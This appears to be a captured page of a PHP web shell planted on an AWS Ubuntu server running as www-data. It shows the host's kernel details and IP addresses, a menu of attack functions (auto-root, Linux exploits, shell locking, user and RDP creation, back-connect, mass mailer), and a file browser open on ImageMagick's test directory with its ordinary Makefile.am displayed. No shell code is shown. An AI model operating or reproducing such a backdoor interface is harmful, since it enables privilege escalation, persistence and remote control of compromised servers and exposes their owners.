Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.144.104.123
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
ubuntu /
ImageMagick-7.0.10-22 /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
.deps
[ DIR ]
drwxrwxr-x
Makefile.am
2.07
KB
-rw-rw-r--
cli-colorspace.tap
3.85
KB
-rwxrwxr-x
cli-pipe.tap
2.49
KB
-rwxrwxr-x
common.shi
286
B
-rw-rw-r--
drawtest.c
19.87
KB
-rw-rw-r--
drawtest.tap
386
B
-rwxrwxr-x
input_256c.miff
4.02
KB
-rw-rw-r--
input_bilevel.miff
3.25
KB
-rw-rw-r--
input_gray.miff
4
KB
-rw-rw-r--
input_truecolor.miff
9.52
KB
-rw-rw-r--
rose.pnm
9.45
KB
-rw-rw-r--
sequence.miff
181.4
KB
-rw-rw-r--
validate-colorspace.tap
798
B
-rwxrwxr-x
validate-compare.tap
795
B
-rwxrwxr-x
validate-composite.tap
797
B
-rwxrwxr-x
validate-convert.tap
795
B
-rwxrwxr-x
validate-formats-disk.tap
800
B
-rwxrwxr-x
validate-formats-map.tap
799
B
-rwxrwxr-x
validate-formats-memory.tap
802
B
-rwxrwxr-x
validate-identify.tap
796
B
-rwxrwxr-x
validate-import.tap
801
B
-rwxrwxr-x
validate-montage.tap
795
B
-rwxrwxr-x
validate-stream.tap
794
B
-rwxrwxr-x
validate.c
86.34
KB
-rw-rw-r--
validate.h
12.62
KB
-rw-rw-r--
wandtest.c
402.38
KB
-rw-rw-r--
wandtest.tap
440
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile.am
# Copyright 1999-2020 ImageMagick Studio LLC, a non-profit organization # dedicated to making software imaging solutions freely available. # # You may not use this file except in compliance with the License. # obtain a copy of the License at # # https://imagemagick.org/script/license.php # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Makefile for the ImageMagick validation suite. TESTS_CPPFLAGS = $(AM_CPPFLAGS) TESTS_CHECK_PGRMS = \ tests/validate \ tests/drawtest \ tests/wandtest tests_validate_SOURCES = tests/validate.c tests/validate.h tests_validate_CPPFLAGS = $(TESTS_CPPFLAGS) tests_validate_LDFLAGS = $(LDFLAGS) tests_validate_LDADD = $(MAGICKCORE_LIBS) $(MAGICKWAND_LIBS) $(MATH_LIBS) tests_drawtest_SOURCES = tests/drawtest.c tests_drawtest_CPPFLAGS = $(TESTS_CPPFLAGS) tests_drawtest_LDFLAGS = $(LDFLAGS) tests_drawtest_LDADD = $(MAGICKCORE_LIBS) $(MAGICKWAND_LIBS) tests_wandtest_SOURCES = tests/wandtest.c tests_wandtest_CPPFLAGS = $(TESTS_CPPFLAGS) tests_wandtest_LDFLAGS = $(LDFLAGS) tests_wandtest_LDADD = $(MAGICKCORE_LIBS) $(MAGICKWAND_LIBS) TESTS_XFAIL_TESTS = TESTS_TESTS = \ tests/cli-colorspace.tap \ tests/cli-pipe.tap \ tests/validate-colorspace.tap \ tests/validate-compare.tap \ tests/validate-composite.tap \ tests/validate-convert.tap \ tests/validate-formats-disk.tap \ tests/validate-formats-map.tap \ tests/validate-formats-memory.tap \ tests/validate-identify.tap \ tests/validate-import.tap \ tests/validate-montage.tap \ tests/validate-stream.tap \ tests/drawtest.tap \ tests/wandtest.tap TESTS_EXTRA_DIST = \ tests/common.shi \ tests/rose.pnm \ tests/input_256c.miff \ tests/input_bilevel.miff \ tests/input_gray.miff \ tests/input_truecolor.miff \ tests/sequence.miff \ $(TESTS_TESTS) TESTS_CLEANFILES = \ tests/*_out.*
Close